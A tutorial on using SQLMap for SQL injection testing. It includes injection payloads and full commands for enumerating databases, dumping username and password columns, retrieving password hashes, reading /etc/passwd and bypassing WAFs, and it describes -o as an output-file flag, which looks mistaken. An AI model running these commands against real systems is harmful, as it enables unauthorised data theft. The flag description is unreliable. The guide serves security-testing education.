SQLMap

Table of Contents

1. Introduction to SQLMap
2. What is SQLMap?
3. Capabilities of SQLMap
   1. Use Cases: SQLMap vs. Other Security Tools
4. Determining Vulnerable Parameters
   1. Manual Techniques
   2. Automated Tools
5. Basic Usage
   1. Command Syntax
   2. Common Options
   3. Practical Steps with SQLMap
6. Practical Example
   1. Step-by-Step Guide
7. Database Enumeration
   1. Listing Databases
   2. Listing Tables
   3. Listing Columns
8. Data Extraction
   1. Dumping Data
9. Password Cracking
   1. Retrieving Password Hashes
   2. Cracking Passwords
10. Advanced Techniques
    1. Bypassing WAFs and Filters
    2. Custom Scripts and Automation
11. Monitoring and Managing Scans
    1. Output and Logging
12. Ethical Considerations
13. Glossary

---

Introduction to SQLMap

SQLMap is a powerful open-source tool used for automating the process of detecting and exploiting SQL injection vulnerabilities in web applications. This guide covers the basics of SQLMap, its capabilities, and advanced techniques to effectively use this tool.

What is SQLMap?

SQLMap is designed to identify and exploit SQL injection flaws in web applications. It can detect and exploit various types of SQL injection techniques, including but not limited to time-based blind, error-based, union query-based, and boolean-based blind SQL injections. SQLMap is widely used in penetration testing and security assessments to uncover and exploit vulnerabilities in databases.

Capabilities of SQLMap

SQLMap excels in automating SQL injection attacks to extract information from databases. Its capabilities include enumerating databases, tables, and columns, extracting data, and even accessing the underlying operating system.

Use Cases: SQLMap vs. Other Security Tools

SQLMap is specialized for detecting and exploiting SQL injection vulnerabilities, offering deep database enumeration and automation.

Web Application Scanners (OWASP ZAP, Nikto, etc.) provide comprehensive scanning for various web application vulnerabilities and offer user-friendly interfaces and extensive reporting. However, they do not delve as deeply into SQL injection exploitation or Windows/Samba enumeration.

Enum4linux is specialized for enumerating information from Windows and Samba shares, offering detailed network configuration, user account, and share information, but it is not applicable to web application or SQL injection vulnerabilities.

Determining Vulnerable Parameters

Determining the vulnerable parameter in a URL or form can be done using both manual techniques and automated tools. Here are some common methods:

Manual Techniques

Error-Based Testing:

• Manually input common SQL injection payloads into each parameter and observe the application’s response.
• For example, appending ‘ OR ‘1’=’1 to a parameter might reveal vulnerability if the application behaves differently (e.g., showing errors or different content).

Logical Testing:

• Modify parameters with boolean conditions and observe changes in the response.
• Example: Change param=value to param=value’ AND ‘1’=’1 and param=value’ AND ‘1’=’2. If the responses differ, the parameter might be vulnerable.

Content-Based Testing:

• Inject SQL commands that alter the structure or content of the response.
• Example: param=value’ UNION SELECT NULL,NULL– to see if additional content appears in the response.

Automated Tools

SQLMap:

• Example command:

sqlmap -u "http://192.168.1.100/index.php?option=com_example&view=example&layout=example&param=example" --level 2 --risk 1

• SQLMap will test each parameter and identify which ones are vulnerable.

Patterns and Indicators

• Unexpected Errors: Seeing database errors or warnings (e.g., SQL syntax errors) in the application’s response.
• Behavior Changes: Differences in page content, redirects, or response times when injecting different payloads.
• Information Disclosure: Unintended disclosure of database information in the application’s response.

Basic Usage

Understanding the command syntax and options is essential for effectively using SQLMap. This section outlines the basic structure and common options available.

Command Syntax

The basic syntax for SQLMap commands is:

sqlmap [options] -u [target URL]

• [options]: Various flags to customize the scan and exploit process.
• [target URL]: The URL of the web application to be tested.

Common Options

Here are some common options used in SQLMap commands:

• -u: Specifies the target URL.
• –batch: Runs in non-interactive mode.
• –dbs: Enumerates databases.
• –tables: Enumerates tables.
• –columns: Enumerates columns.
• –dump: Dumps the database contents.
• –passwords: Retrieves password hashes.
• –level: Sets the level of tests to perform (1-5).
• –risk: Sets the risk of tests to perform (1-3).

Practical Steps with SQLMap

Start with a Basic Scan:

sqlmap -u "http://example.com/index.php?id=1"

• SQLMap will test common parameters.

Increase the Level and Risk for More Comprehensive Testing:

sqlmap -u "http://example.com/index.php?id=1" --level 3 --risk 2

Test All Parameters Automatically:

sqlmap -u "http://example.com/index.php?id=1&name=test&age=20" --batch --random-agent --dbs

• SQLMap will iterate through each parameter and test for vulnerabilities.

Practical Example

To better understand how SQLMap works in a real-world scenario, here is a practical example demonstrating the steps involved in enumerating and extracting data from a target database.

Step-by-Step Guide

Given the IP address of the target, you need to adjust the SQLMap command to point to the correct target URL. Here’s how to adapt your command:

Target URL: http://192.168.1.100/index.php?option=com_example&view=example&layout=example&param=example

Vulnerable Parameter: param

Enumerate Databases

This command will enumerate all databases on the target server.

sqlmap -u "http://192.168.1.100/index.php?option=com_example&view=example&layout=example&param=example" --risk=3 --level=5 --random-agent --dbs -p param

Select a Target Database

After identifying the databases, select the relevant database (e.g., example_db).

Enumerate Tables

List all tables in the selected database.

sqlmap -u "http://192.168.1.100/index.php?option=com_example&view=example&layout=example&param=example" --risk=3 --level=5 --random-agent -D example_db --tables -p param

Enumerate Columns

Choose a table, such as users, and list all columns.

sqlmap -u "http://192.168.1.100/index.php?option=com_example&view=example&layout=example&param=example" --risk=3 --level=5 --random-agent -D example_db -T users --columns -p param

Dump Data

Dump data from columns of interest, such as username and password.

sqlmap -u "http://192.168.1.100/index.php?option=com_example&view=example&layout=example&param=example" --risk=3 --level=5 --random-agent -D example_db -T users -C username,password --dump -p param

Additional Commands for Advanced Exploitation

Read a File

sqlmap -u "http://192.168.1.100/index.php?option=com_example&view=example&layout=example&param=example" --risk=3 --level=5 --random-agent --file-read=/etc/passwd -p param

Write to a File

sqlmap -u "http://192.168.1.100/index.php?option=com_example&view=example&layout=example&param=example" --risk=3 --level=5 --random-agent --file-write=/tmp/example.txt

 --file-dest=/tmp/example.txt -p param

Database Enumeration

SQLMap can enumerate databases, tables, and columns from the target system.

Listing Databases

To list databases on the target system:

Example Command:

sqlmap -u [target URL] --dbs

• –dbs: Enumerates databases.

Listing Tables

To list tables within a specific database:

Example Command:

sqlmap -u [target URL] -D [database name] --tables

• -D [database name]: Specifies the database to enumerate tables from.
• –tables: Enumerates tables.

Listing Columns

To list columns within a specific table:

Example Command:

sqlmap -u [target URL] -D [database name] -T [table name] --columns

• -D [database name]: Specifies the database.
• -T [table name]: Specifies the table.
• –columns: Enumerates columns.

Data Extraction

SQLMap can extract data from the databases.

Dumping Data

To dump data from a specific table:

Example Command:

sqlmap -u [target URL] -D [database name] -T [table name] --dump

• –dump: Dumps the data from the specified table.

Password Cracking

SQLMap can retrieve and crack password hashes.

Retrieving Password Hashes

To retrieve password hashes from the database:

Example Command:

sqlmap -u [target URL] --passwords

• –passwords: Retrieves password hashes.

Cracking Passwords

Once hashes are retrieved, use tools like John the Ripper or Hashcat to crack them.

Advanced Techniques

Advanced techniques in SQLMap include bypassing web application firewalls (WAFs) and using custom scripts for automation.

Bypassing WAFs and Filters

SQLMap can bypass some WAFs and filters with the –tamper option, which uses tamper scripts.

Example Command:

sqlmap -u [target URL] --tamper=[tamper script]

Custom Scripts and Automation

Automating SQLMap with custom scripts can streamline the testing process.

Example Script:

#!/bin/bash
target=$1
sqlmap -u $target --batch --dbs --tables --dump-all

Monitoring and Managing Scans

Effective monitoring and management of scans are crucial for maximizing SQLMap’s effectiveness.

Output and Logging

SQLMap can output results to a file for later analysis.

Example Command:

sqlmap -u [target URL] --dump -o output.txt

• -o output.txt: Outputs results to the specified file.

Ethical Considerations

It’s crucial to use SQLMap responsibly and ethically. Ensure you have explicit permission to perform security testing on any network or system you target. Unauthorized use of SQLMap can lead to legal consequences.

---

Glossary

Below is a list of commands and their descriptions used in SQLMap.

Command	Description
sqlmap	Command to invoke SQLMap, used for SQL injection testing.
-u	Specifies the target URL.
–batch	Runs in non-interactive mode.
–dbs	Enumerates databases.
–tables	Enumerates tables.
–columns	Enumerates columns.
–dump	Dumps the database contents.
–passwords	Retrieves password hashes.
–level	Sets the level of tests to perform (1-5).
–risk	Sets the risk of tests to perform (1-3).
–tamper	Uses tamper scripts to bypass WAFs and filters.

---